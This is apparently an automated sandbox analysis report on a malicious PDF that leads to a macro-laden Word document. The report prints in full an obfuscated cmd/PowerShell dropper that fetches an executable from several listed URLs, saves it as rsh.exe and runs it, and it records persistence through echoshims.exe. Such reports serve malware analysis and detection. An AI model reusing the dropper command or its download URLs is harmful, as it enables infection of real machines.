Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....3...........................2........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.4.9. .E.Q.U. .0. ..3..............................\....3................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..3....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....3..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...$3..........................s.k.t.o.p.>.@..Jt.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...03............................2..@..`.2. .4.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.4.8.,.1.!. ...............2..@..`.2. .4...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...<3..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...B3..........................<3........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.4.8. .E.Q.U. .0. .H3..............................\...B3................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.N3....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...Z3..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...a3..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jx.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...m3............................2..@..`.2. .4.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.4.7.,.1.!. ...............2..@..`.2. .4...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...y3..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....3..........................y3........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.4.7. .E.Q.U. .0. ..3..............................\....3................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..3....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....3..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....3..........................s.k.t.o.p.>.@..Jx.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J.P4.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....3............................2..@..`.2..S4.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.4.6.,.1.!. ...............2..@..`.2..S4...o.........,....E.J........

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\DOC-642857352.pdf'
Source: unknown	Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3696.0.183658897 --type=renderer 'C:\Users\user\Desktop\DOC-642857352.pdf'
Source: unknown	Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4 --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc
Source: unknown	Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3808.0.1048347210 --type=renderer --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:1992 CREDAT:275457 /prefetch:2
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' =wwH
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\rsh.exe 'C:\Users\user\AppData\Local\Temp\rsh.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\rsh.exe C:\Users\user\AppData\Local\Temp\rsh.exe
Source: unknown	Process created: C:\Windows\System32\echoshims.exe C:\Windows\system32\echoshims.exe
Source: unknown	Process created: C:\Windows\System32\echoshims.exe C:\Windows\system32\echoshims.exe
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3696.0.183658897 --type=renderer 'C:\Users\user\Desktop\DOC-642857352.pdf'	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3808.0.1048347210 --type=renderer --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:1992 CREDAT:275457 /prefetch:2	Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' =wwH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\rsh.exe 'C:\Users\user\AppData\Local\Temp\rsh.exe'
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Process created: C:\Users\user\AppData\Local\Temp\rsh.exe C:\Users\user\AppData\Local\Temp\rsh.exe
Source: C:\Windows\System32\echoshims.exe	Process created: C:\Windows\System32\echoshims.exe C:\Windows\system32\echoshims.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Uses Rich Edit Controls

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

File opened: C:\Windows\system32\Msftedit.dll

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe

File opened: C:\Windows\system32\MSVCR100.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1058862175.044DD000.00000004.sdmp
Source:	Binary string: C:\Windows\System.pdbn. source: powershell.exe, 0000000F.00000002.1055630754.01BB7000.00000004.sdmp
Source:	Binary string: Pb730.pdb source: powershell.exe, 0000000F.00000003.1047870554.04575000.00000004.sdmp, rsh.exe, 00000012.00000000.1043417543.00403000.00000002.sdmp, rsh.exe, 00000013.00000000.1050254699.00403000.00000002.sdmp, echoshims.exe, 00000014.00000002.1065447750.00403000.00000002.sdmp, echoshims.exe, 00000015.00000000.1064173246.00403000.00000002.sdmp, rsh.exe.15.dr
Source:	Binary string: C:\Windows\dll\System.pdb\S source: powershell.exe, 0000000F.00000002.1055630754.01BB7000.00000004.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.1055630754.01BB7000.00000004.sdmp
Source:	Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1042404798.003A1000.00000004.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1058862175.044DD000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1055630754.01BB7000.00000004.sdmp, powershell.exe, 00000010.00000002.1053825437.01B87000.00000004.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1055630754.01BB7000.00000004.sdmp, powershell.exe, 00000010.00000002.1053825437.01B87000.00000004.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 0000000F.00000002.1055527636.01B50000.00000002.sdmp, powershell.exe, 00000010.00000002.1053695006.01B20000.00000002.sdmp
Source:	Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000010.00000002.1053825437.01B87000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1055630754.01BB7000.00000004.sdmp, powershell.exe, 00000010.00000002.1053825437.01B87000.00000004.sdmp

PDF has a JavaScript or JS counter value indicative of goodware

Show sources

Source: DOC-642857352.pdf	Initial sample: PDF keyword /JS count = 0
Source: DOC-642857352.pdf	Initial sample: PDF keyword /JavaScript count = 0

PDF has an EmbeddedFile counter value indicative of goodware

Show sources

Source: DOC-642857352.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables

Show sources

Source: PAYMENT _223848OEIWWWS[1].doc.8.dr	Stream path 'Macros/VBA/vUOGvVsqYQkM' : High entropy of concatenated variable names
Source: PAYMENT _223848OEIWWWS.doc.3sjibq6.partial.8.dr	Stream path 'Macros/VBA/vUOGvVsqYQkM' : High entropy of concatenated variable names

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'ZM' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' '

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like 'MZ') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} '

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 18_2_00211A36 LoadLibraryA,GetProcAddress,

18_2_00211A36

PE file contains an invalid checksum

Show sources

Source: rsh.exe.15.dr

Static PE information: real checksum: 0xc32a9a69 should be: 0x2c707

PE file contains sections with non-standard names

Show sources

Source: rsh.exe.15.dr

Static PE information: section name: CONST

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_00425C62 push edi; iretd	18_2_00425C65
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_004082AC push eax; retf	18_2_004082BA
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_00426114 push edi; iretd	18_2_00426115
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_0040A535 push esi; iretd	18_2_0040A54B
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_00407BCD push edx; retf	18_2_00407BD3
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 18_2_00425F96 push ecx; retf	18_2_00425F97
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00425C62 push edi; iretd	19_2_00425C65
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_004082AC push eax; retf	19_2_004082BA
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00426114 push edi; iretd	19_2_00426115
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_0040A535 push esi; iretd	19_2_0040A54B
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00407BCD push edx; retf	19_2_00407BD3
Source: C:\Users\user\AppData\Local\Temp\rsh.exe	Code function: 19_2_00425F96 push ecx; retf	19_2_00425F97

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\echoshims.exe

Executable created and started: C:\Windows\System32\echoshims.exe

Drops PE files

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\rsh.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

PE file moved: C:\Windows\System32\echoshims.exe

Boot Survival:

Contains functionality to start windows services

Show sources

Source: C:\Users\user\AppData\Local\Temp\rsh.exe

Code function: 19_2_0021F9F1 StartServiceW,CloseServiceHandle,CloseServiceHandle,

19_2_0021F9F1

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources
